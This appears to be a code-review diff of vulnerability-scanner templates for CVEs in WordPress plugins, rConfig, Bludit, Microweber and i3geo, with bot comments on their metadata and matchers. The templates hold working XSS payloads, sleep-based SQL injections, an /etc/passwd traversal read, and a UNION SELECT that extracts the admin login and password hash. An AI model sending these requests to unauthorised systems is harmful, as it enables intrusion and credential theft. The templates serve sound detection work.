description: |
The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.
remediation: Fixed in 2.8.3
The plugins do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting
reference:
- https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
- https://nvd.nist.gov/vuln/detail/CVE-2021-25016
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-25016
cwe-id: CWE-79
epss-score: 0.00095
epss-percentile: 0.39536
cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: premio
product: chaty
framework: wordpress
publicwww-query: "/wp-content/plugins/chaty/"
tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty
tags: cve,cve2023,wpscan,wordpress,authenticated,wp-plugin,xss,chaty
http:
- raw:
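
Review bot: one of the two `tags` lines carries `cve2023` although the `id` is CVE-2021-25016; keep `cve2021`. Both `author: luisfelipe146` and `author: r3Y3r53` appear and the header takes this range from 32 to 17 lines, so if the `remediation`, `epss-score`, `epss-percentile`, `cpe`, `vendor`, `product`, `framework` and `publicwww-query` lines are on the removed side, this drops existing metadata and the original author credit; keep them unless there is a stated reason to remove them.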
@ -36,26 +21,18 @@ http:
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
redirects: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "search=</script><img src onerror=alert(document.domain)>"
- "chaty_page_chaty"
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "<script>alert(document.domain)</script>")'
- 'contains(body_2, "Chaty")'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
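
Review bot: the dsl matcher checks `status_code_2` and two body strings but has no content-type condition, and its product marker is the generic `"Chaty"` where the word matcher in this hunk uses `chaty_page_chaty`. If the dsl block replaces the word, header and status matchers, add `contains(content_type_2, "text/html")` and keep the more specific marker so a page that merely mentions the plugin name does not match.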

@ -0,0 +1,38 @@
id: CVE-2021-25079
info:
name: Contact Form Entries < 1.2.4 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search before outputting them back in the admin page
remediation: Fixed in version 1.1.7
reference:
- https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63
- https://nvd.nist.gov/vuln/detail/CVE-2021-25079
- https://wordpress.org/plugins/contact-form-entries/
metadata:
verified: true
max-request: 2
tags: cve,cve2021,wordpress,wp-plugin,wpscan,authenticated,contact-form-entries,xss
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ez2u4g HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- "contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'contact-form')"
condition: and
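
Review bot: `name` says the issue affects versions `< 1.2.4` but `remediation` says "Fixed in version 1.1.7"; one of the two is wrong, so check it against the WPScan entry in `reference`. There is no `classification` block, and the description ends without saying what the unescaped output leads to.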

@ -0,0 +1,54 @@
id: CVE-2021-29006
info:
name: rConfig 3.9.6 - Local File Inclusion
author: r3Y3r53
severity: medium
description: |
rConfig 3.9.6 is affected by a Local File Disclosure vulnerability. An authenticated user may successfully download any file on the server.
reference:
- https://github.com/mrojz/rconfig-exploit/blob/main/CVE-2021-29006-POC.py
- https://nvd.nist.gov/vuln/detail/CVE-2021-29006
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2021-29006
cwe-id: CWE-22
metadata:
verified: true
shodan-query: http.title:"rConfig"
tags: cve,cve2021,rconfig,authenticated,lfi
http:
- raw:
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
- |
GET /dashboard.php HTTP/1.1
Host: {{Hostname}}
- |
GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=/etc/passwd HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body_3
regex:
- 'root:.*:0:0:'
- type: word
part: body_2
words:
- 'rconfig'
- type: status
part: header_3
status:
- 200
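
Review bot: the last matcher is `type: status` with `part: header_3`; a status matcher compares the response code and has no use for a header part, so it is unclear which of the three responses it is checked against. Express it as a dsl condition on `status_code_3` instead. The `name` says "Local File Inclusion" while the description reports a file disclosure (download), and `max-request` is missing.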

@ -0,0 +1,53 @@
id: CVE-2021-35323
info:
name: Bludit 3.13.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Cross Site Scripting (XSS) vulnerability exists in bludit 3-13-1 via the username in admin/login
remediation: Bludit v4.0.0
reference:
- https://github.com/bludit/bludit/issues/1327
- https://nvd.nist.gov/vuln/detail/CVE-2021-35323
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-35323
cwe-id: CWE-79
metadata:
verified: true
shodan-query: title:"Bludit"
tags: cve,cve2021,bludit,xss
http:
- raw:
- |
GET /bludit/admin/login HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 10s
POST /bludit/admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
tokenCSRF={{tokenCSRF}}&username=admin%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&password=pass&save=
cookie-reuse: true
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<img src=x onerror=alert(document.domain)>") && contains(body_2, "Bludit")'
condition: and
extractors:
- type: regex
name: tokenCSRF
part: body
group: 1
regex:
- 'type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*)"'
internal: true
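
Review bot: both requests hardcode the `/bludit/` prefix (`GET /bludit/admin/login`, `POST /bludit/admin/login`), so installations served from the web root or another directory are never tested; add a variant for `/admin/login`. The extractor regex `value="(.*)"` is greedy and will run to the last double quote on the line, so use `value="([^"]+)"`. `remediation: Bludit v4.0.0` should be a full instruction, and `max-request` is missing.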

@ -0,0 +1,47 @@
id: CVE-2022-0228
info:
name: Popup Builder < 4.0.7 - SQL Injection
author: r3Y3r53
severity: high
description: |
The Popup Builder WordPress plugin before 4.0.7 does not validate and properly escape the orderby and order parameters before using them in a SQL statement in the admin dashboard, which could allow high privilege users to perform SQL injection.
remediation: update to v.4.0.7
reference:
- https://wpscan.com/vulnerability/22facac2-52f4-4e5f-be59-1d2934b260d9
- https://nvd.nist.gov/vuln/detail/CVE-2022-0228
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cwe-id: CWE-89
cve-id: 2022-0228
cpe: cpe:2.3:a:sygnoos:popup_builder:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
publicwww-query: "/wp-content/plugins/popup-builder/"
max-request: 1
tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,popup-builder
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout: 15s
GET /wp-admin/admin-post.php?action=csv_file&orderby=email%2c(select+*+from(select(sleep(7)))b)&order=desc HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration_2>=7'
- 'status_code_2 == 200'
- 'contains_all(body_2, "first name", "last name", "email")'
- 'contains(content_type_2, "application/octet-stream")'
condition: and
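
Review bot: `cve-id: 2022-0228` in `classification` is missing the `CVE-` prefix; write `cve-id: CVE-2022-0228`. The tags lack `sqli` and `authenticated` although the template logs in and sends a `sleep(7)` payload, and `max-request: 1` does not match the two requests.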

@ -0,0 +1,44 @@
id: CVE-2022-0533
info:
name: Ditty (formerly Ditty News Ticker) < 3.0.15 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The Ditty (formerly Ditty News Ticker) WordPress plugin before 3.0.15 is affected by a Reflected Cross-Site Scripting (XSS) vulnerability.
remediation: upgrade to v.3.0.15
reference:
- https://wpscan.com/vulnerability/40f36692-c898-4441-ad24-2dc17856bd74
- https://nvd.nist.gov/vuln/detail/CVE-2022-0533
- https://vulners.com/cve/CVE-2022-0533
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
tags: cve,cve2022,xss,ditty,wp,wordpress,wpscan,wp-plugin,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?post_type=ditty&page=ditty_settings&tab=%22%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains_all(body_2, "<img src onerror=alert(document.domain)>", "ditty")'
condition: and
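Review bot: the classification block lists `cvss-metrics`, `cvss-score`, `cwe-id` and `cpe` but no `cve-id`; add `cve-id: CVE-2022-0533` so the entry can be indexed by CVE like the templates that carry the field. The description only says the plugin "is affected by" reflected XSS, while the request shows the reflected input is the `tab` parameter of the `ditty_settings` page; naming it would help whoever triages a finding.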

View File

@ -0,0 +1,52 @@
id: CVE-2022-0651
info:
name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection
author: theamanrawat
severity: critical
description: |
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_type parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
remediation: Update wp-statistics plugin to version 13.1.6, or newer.
reference:
- https://wordpress.org/plugins/wp-statistics/
- https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042
- https://nvd.nist.gov/vuln/detail/CVE-2022-0651
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0651
cwe-id: CWE-89
metadata:
max-request: 2
verified: true
google-query: inurl:/wp-content/plugins/wp-statistics
tags: cve,cve2022,sqli,wp,wordpress,wp-plugin,wp,wp-statistics
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 20s
GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home'-sleep(6)-'&current_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
- contains(header, "application/json")
- contains(body, 'Visitor Hit was recorded successfully')
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- '_wpnonce=([0-9a-zA-Z]+)'
internal: true
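Review bot: in the matchers, `duration>=6` is the only condition that depends on the injection; the `200` status, the `application/json` header and the 'Visitor Hit was recorded successfully' body look like the endpoint's ordinary success response. A slow or loaded host that takes six seconds to answer would therefore be reported as vulnerable. Consider comparing against a baseline request without the `sleep`, or state the false-positive risk in the description. The `tags` line also lists `wp` twice.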

View File

@ -0,0 +1,40 @@
id: CVE-2022-0658
info:
name: CommonsBooking < 2.6.8 - SQL Injection
author: theamanrawat
severity: critical
description: |
The plugin does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection.
remediation: Fixed in version 2.6.8
reference:
- https://wpscan.com/vulnerability/d7f0805a-61ce-454a-96fb-5ecacd767578
- https://wordpress.org/plugins/commonsbooking/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0658
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0658
cwe-id: CWE-89
metadata:
verified: true
tags: cve,cve2022,wordpress,wp-plugin,wp,commonsbooking,sqli
http:
- raw:
- |
@timeout: 20s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=calendar_data&sd=2099-02-13&ed=2099-02-13&item=1&location=(SELECT+1743+FROM+(SELECT(SLEEP(6)))iXxL3)
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(header, "application/json")'
- 'contains(body, "partiallyBookedDays") && contains(body, "lockDays")'
condition: and

View File

@ -0,0 +1,41 @@
id: CVE-2022-0787
info:
name: Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections.
remediation: Fixed in version 5.1
reference:
- https://wpscan.com/vulnerability/69329a8a-2cbe-4f99-a367-b152bd85b3dd
- https://wordpress.org/plugins/wp-limit-failed-login-attempts/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0787
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0787
cwe-id: CWE-89
metadata:
max-request: 1
verified: true
tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts
http:
- raw:
- |
@timeout: 15s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=WPLFLA_get_log_data&order[][column]=0&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU)
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
- contains(all_headers, "text/html")
- contains(body, 'iTotalDisplayRecords')
condition: and
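Review bot: `contains(all_headers, "text/html")` uses a different variable from the neighbouring templates, which test `header` or `content_type`; `contains(content_type, "text/html")` would keep the matcher set uniform and check the Content-Type value rather than any header that happens to contain the string. The DSL expressions here are also unquoted while most templates in this commit quote them; pick one style.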

View File

@ -0,0 +1,51 @@
id: CVE-2022-0814
info:
name: Ubigeo de Peru < 3.6.4 - SQL Injection
author: r3Y3r53
severity: critical
description: |
The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.
reference:
- https://wpscan.com/vulnerability/fd84dc08-0079-4fcf-81c3-a61d652e3269
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0814
- https://wordpress.org/plugins/ubigeo-peru/
remediation: Fixed in version 3.6.4
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0814
cwe-id: CWE-89
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/ubigeo-peru/"
tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users#
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'idProv'
- 'idDist'
- 'distrito'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
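Review bot: none of the matchers depends on the injected `UNION SELECT`; the words `idProv`, `idDist` and `distrito` look like field names of the endpoint's ordinary response, so a patched site that still answers this AJAX action would match. The request also selects `user_login` and `user_pass` for user ID 1, which pulls a real account's password hash into scan output when a detection template only needs proof that the query was altered. Selecting a fixed constant and matching on that value would make the check specific to the vulnerability and safer for the scanned site.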

View File

@ -0,0 +1,42 @@
id: CVE-2022-0899
info:
name: Header Footer Code Manager < 1.1.24 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The Header Footer Code Manager WordPress plugin before 1.1.24 does not escape generated URLs before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/1772417a-1abb-4d97-9694-1254840defd1
- https://nvd.nist.gov/vuln/detail/CVE-2022-0899
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0899
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,wp,wp-plugin,wordpress,xss,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=hfcm-list&'><script>alert(/document.domain/)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<script>alert(/document.domain/)</script>")'
- 'contains(body_2, "All Snippets")'
condition: and
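Review bot: the second request line sends `'><script>alert(/document.domain/)</script>` unencoded, whereas the neighbouring reflected-XSS requests percent-encode the payload in the request line; raw `<`, `>` and `'` in a request target can be rejected or rewritten by proxies in front of the site, which would hide a real finding. Percent-encode the request and keep the decoded form in the `body_2` matcher. `metadata` also has no `max-request` for the two requests sent.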

View File

@ -0,0 +1,36 @@
id: CVE-2022-2174
info:
name: microweber 1.2.18 - Cross-site Scripting
author: r3Y3r53
severity: medium
description: |
Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.18.
reference:
- https://huntr.dev/bounties/ac68e3fc-8cf1-4a62-90ee-95c4b2bad607/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2174
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-2174
- https://www.tenable.com/cve/CVE-2022-2174
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
cve-id: CVE-2022-2174
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
tags: cve,cve2023,microweber,xss,unauth
http:
- method: GET
path:
- "{{BaseURL}}/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test"
matchers:
- type: dsl
dsl:
- 'status_code == 500'
- 'contains(body, "<script>alert(document.domain)</script>") && contains(body, "microweber")'
- 'contains(content_type, "text/html")'
condition: and
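Review bot: the `tags` line carries `cve2023` for a CVE-2022 identifier; it should be `cve2022`, otherwise year-based tag filters miss this template. The third reference, `cvename.cgi?name=2022-2174`, drops the `CVE-` prefix from the name parameter. The `name` says "microweber 1.2.18" while the description says versions prior to 1.2.18 are affected; `Microweber < 1.2.18` would agree with the description.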

View File

@ -0,0 +1,52 @@
id: CVE-2022-25148
info:
name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection
author: theamanrawat
severity: critical
description: |
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_id parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
remediation: Update wp-statistics plugin to version 13.1.6, or newer.
reference:
- https://wordpress.org/plugins/wp-statistics/
- https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042
- https://nvd.nist.gov/vuln/detail/CVE-2022-25148
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-25148
cwe-id: CWE-89
metadata:
max-request: 2
verified: true
google-query: inurl:/wp-content/plugins/wp-statistics
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 15s
GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=sleep(6)&search_query&page_uri=/&user_id=0 HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
- contains(header, "application/json")
- contains(body, 'Visitor Hit was recorded successfully')
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- '_wpnonce=([0-9a-zA-Z]+)'
internal: true

View File

@ -0,0 +1,51 @@
id: CVE-2022-25149
info:
name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection
author: theamanrawat
severity: critical
description: |
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the IP parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
reference:
- https://wordpress.org/plugins/wp-statistics/
- https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042
- https://nvd.nist.gov/vuln/detail/CVE-2022-25149
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-25149
cwe-id: CWE-89
metadata:
max-request: 2
verified: true
publicwww-query: "/wp-content/plugins/wp-statistics/"
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 50s
GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip='-sleep(6)-'&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
- contains(header, "application/json")
- contains(body, 'Visitor Hit was recorded successfully')
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- '_wpnonce=([0-9a-zA-Z]+)'
internal: true
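Review bot: the `info` block has no `remediation` line, although the two other WP Statistics templates in this commit for the same affected versions state "Update wp-statistics plugin to version 13.1.6, or newer."; add the same line here. `@timeout: 50s` is also much larger than the 15s and 20s used by those templates for the same `sleep(6)`; if the longer value is deliberate, a comment should say why.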

View File

@ -0,0 +1,35 @@
id: CVE-2022-2535
info:
name: SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure
author: r3Y3r53
severity: Medium
description: |
The plugin does not ensure that users making. alive search are limited to published posts only, allowing unauthenticated users to make a crafted query disclosing private/draft/pending post titles along with their permalink
remediation: Fixed in version 1.6.2
reference:
- https://wpscan.com/vulnerability/0e13c375-044c-4c2e-ab8e-48cb89d90d02
- https://nvd.nist.gov/vuln/detail/CVE-2022-2535
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-2535
cwe-id: CWE-639
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/searchwp-live-ajax-search/"
tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "searchwp-live-search-result")'
condition: and
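Review bot: the matchers pass on any `200` `text/html` response containing `searchwp-live-search-result`, which does not show that a draft post was returned; if published posts produce the same markup for `swpquery=a`, a fixed install matches too. The check needs something that distinguishes the `post_status=draft` result, or the description should state the limitation. Smaller points: `severity: Medium` is capitalised unlike the lowercase values elsewhere, the tags say `cve2023` for a 2022 CVE, and the description has a typo ("making. alive search" for "making a live search").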

View File

@ -0,0 +1,45 @@
id: CVE-2022-3142
info:
name: NEX-Forms Plugin < 7.9.7 - SQL Injection
author: r3Y3r53
severity: high
description: |
The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.
remediation: Fixed in version 7.9.7
reference:
- https://wpscan.com/vulnerability/8acc0fc6-efe6-4662-b9ac-6342a7823328/
- https://www.exploit-db.com/exploits/51042
- https://nvd.nist.gov/vuln/detail/CVE-2022-3142
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cwe-id: CWE-89
cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
tags: cve,cve2022,wordpress,sqli,wp-plugin,wp,wpscan,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout: 30s
GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)-- HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code_2 == 200'
- 'contains(body_2, "NEX-Forms")'
- 'contains(content_type_2, "text/html")'
condition: and
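Review bot: `duration>=5` is the only matcher expression without the `_2` suffix; the status, body and content-type checks are pinned to the second response, so write `duration_2>=5` to make the timing check explicitly refer to the injected request. The classification block has no `cve-id`, and `metadata` has no `max-request` although two requests are sent.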

View File

@ -0,0 +1,34 @@
id: CVE-2022-3242
info:
name: Microweber <1.3.2 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Code Injection in on search.php?keywords= GitHub repository microweber/microweber prior to 1.3.2.
reference:
- https://huntr.dev/bounties/3e6b218a-a5a6-40d9-9f7e-5ab0c6214faf/
- https://www.tenable.com/cve/CVE-2022-3242
- https://nvd.nist.gov/vuln/detail/CVE-2022-3242
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
tags: xss,cve,cve2023,microweber
http:
- method: GET
path:
- "{{BaseURL}}/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<script>alert(document.domain)</script>") && contains(tolower(body), "microweber")'
condition: and
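Review bot: the `name` calls this Cross-Site Scripting and the classification uses CWE-79, but the description reads "Code Injection in on search.php?keywords="; align the description with the XSS finding and fix the doubled "in on". The tags say `cve2023` for a 2022 CVE, and the classification block has no `cve-id`.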

View File

@ -0,0 +1,33 @@
id: CVE-2022-34093
info:
name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-34093
- https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt#L44
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-34093
cwe-id: CWE-79
cpe: cpe:2.3:a:i3geo_project:i3geo:7.0.5:*:*:*:*:*:*:*
metadata:
verified: true
tags: cve,cve2022,i3geo,xss
http:
- method: GET
path:
- "{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/access_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"
